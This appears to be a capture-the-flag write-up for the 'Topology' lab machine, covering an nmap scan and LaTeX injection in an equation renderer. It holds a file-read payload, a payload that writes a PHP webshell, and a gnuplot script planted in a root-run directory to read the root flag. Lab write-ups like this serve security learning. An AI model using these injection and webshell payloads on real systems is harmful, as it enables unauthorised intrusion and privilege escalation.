Topology
- Date completed: 2023-06-15
- Difficulty: Easy
- OS: Linux
User flag
Initial nmap:
$ nmap -sC -sV 10.10.11.217
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-14 10:07 CDT
Nmap scan report for 10.10.11.217
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
| 256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_ 256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.65 seconds
The page has a link to http://latex.topology.htb
Creates images using urls of the form http://latex.topology.htb/equation.php?eqn=\int_{1}^{\infty}{x^2\+dx}&submit=
Files can be read using this payload (only shows first line):
\newread\file \openin\file=/etc/passwd \read\file to\line \text{\line} \closein\file
As this site uses php, it may be possible to use a webshell.
Payload?:
\catcode`#=0 #newwrite#outfile #openout#outfile=testit.php #write#outfile{<?php system($_GET['cmd']); ?>} #closeout#outfile
Using the webshell found a hash at /var/www/dev/.htpasswd, cracked using hashcat
Logged in with ssh and got the user flag!
Root flag
The user vdaisley has no sudo permissions.
Running pspy on the machine shows that the command find /opt/gnuplot -name *.plt -exec gnuplot {} ; is run repeatedly.
The /opt/gnuplot directory is writable:
vdaisley@topology:~$ ls -la /opt/
total 12
drwxr-xr-x 3 root root 4096 May 19 13:04 .
drwxr-xr-x 18 root root 4096 Jun 12 10:37 ..
drwx-wx-wx 2 root root 4096 Jun 14 07:45 gnuplot
Gnuplot allows a system command, which is used to run shell commands. Thus a new file can be created and added to the directory:
echo 'system "cat /root/root.txt > /dev/shm/.a"' > /opt/gnuplot/aaaa1.plt
Then we can get the root flag.